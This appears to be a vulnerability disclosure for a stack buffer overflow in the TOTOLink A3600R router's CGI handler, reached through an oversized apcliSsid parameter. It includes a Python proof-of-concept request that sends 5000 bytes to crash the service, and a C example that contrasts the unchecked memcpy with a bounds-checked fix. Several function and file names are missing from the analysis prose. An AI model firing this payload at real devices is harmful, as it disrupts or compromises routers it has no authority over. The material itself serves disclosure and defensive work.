# Key Information

## Target Device

- Device: TOTOLink A3600R router
- Firmware version: V5.9c.4959

## Vulnerability Type

Buffer Overflow

## Vulnerability Details

The vulnerability exists in the  interface of the  file. It stems from the length of the  parameter not being strictly validated, so the subsequent memcpy call overflows the stack buffer.

## Vulnerability Analysis

In the  function: the function obtains the  parameter value via  and copies it into a fixed-size 32-byte stack buffer  without any bounds check. When the supplied  value is longer than 32 bytes, the copy overflows the stack buffer, potentially overwriting adjacent stack memory and causing memory corruption, a process crash, or arbitrary code execution.

## POC (Proof of Concept)

Python code used to verify the vulnerability:

```python
import requests
import json

# Target: the router's CGI endpoint on the default LAN address
url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
headers = {
    "Host": "192.168.0.1",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0",
    "Accept": "*/*",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Origin": "http://192.168.0.1",
    "Referer": "http://192.168.0.1/internet/ipv6_wan.asp?timestamp=1768535405207",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Cookie": "SESSION_ID=2:1768535901:2",
    "Connection": "keep-alive",
}

# 5000 bytes: far more than the 32-byte stack buffer that receives apcliSsid
repeat = "A" * 5000
data = {
    "topicurl": "setting/setAppEasyWizardConfig",
    "functionType": "2",
    "rootFlag": "2",
    "wifiIdx": "1",
    "apcliSsid": repeat,
}
payload = json.dumps(data)  # JSON-serialised copy of the body (unused; the request below sends the form-encoded dict)

response = requests.post(url, headers=headers, data=data, timeout=10)

# Dump status, headers and body; a crashed CGI process typically shows up as a timeout or an empty/abnormal reply
print(response.status_code)
for k, v in response.headers.items():
    print(f"{k}: {v}")
print(response.text)
```
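The unchecked memcpy pattern the analysis describes, next to a bounds-checked replacement, as an added C example that is not the firmware's own code: the function names, the buffer size constant and the constructed sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Size of the stack buffer that receives the SSID value: 32 bytes, as stated
 * in the advisory. The checked copy rejects anything that would not leave
 * room for a terminating NUL, so at most 31 characters are accepted here
 * (assumption for this example). */
#define SSID_BUF_SIZE 32

/* Vulnerable pattern described in the advisory (hypothetical name): the
 * request parameter is copied with memcpy using the attacker-controlled
 * length, so anything longer than the buffer spills into adjacent stack
 * memory. Kept only to contrast with the checked version; this example
 * never calls it with oversized input. */
static void copy_ssid_unchecked(char *dst, const char *src)
{
    memcpy(dst, src, strlen(src));   /* no bounds check */
}

/* Hardened form: validate the length against the destination size before
 * copying, reject oversized values, and always NUL-terminate.
 * Returns the copied length, or -1 if the value was rejected. */
int copy_ssid_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)   /* leave room for the NUL */
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

/* Wrapper mirroring the request handler's decision: returns 1 if the
 * supplied apcliSsid value fits the 32-byte stack buffer, 0 if it must be
 * rejected before any copy happens. */
int apcli_ssid_is_acceptable(const char *value)
{
    char buf[SSID_BUF_SIZE];
    return copy_ssid_checked(buf, sizeof buf, value) >= 0;
}

int main(void)
{
    char buf[SSID_BUF_SIZE];
    /* Constructed inputs: a normal SSID and a 5000-byte run of 'A' like the PoC's. */
    char oversized[5001];
    memset(oversized, 'A', 5000);
    oversized[5000] = '\0';

    copy_ssid_unchecked(buf, "HomeWiFi");   /* fits, so harmless here */
    printf("unchecked copy of short value: %.8s\n", buf);

    printf("checked copy of \"HomeWiFi\": %d\n",
           copy_ssid_checked(buf, sizeof buf, "HomeWiFi"));   /* 8 */
    printf("checked copy of 5000 x 'A': %d\n",
           copy_ssid_checked(buf, sizeof buf, oversized));    /* -1 */
    printf("5000 x 'A' acceptable: %d\n",
           apcli_ssid_is_acceptable(oversized));              /* 0 */
    return 0;
}
```

The decisive difference is that the length check uses the destination's size, not the source's, and happens before memcpy; a rejected value never touches the stack buffer, so the 5000-byte input from the PoC is simply refused.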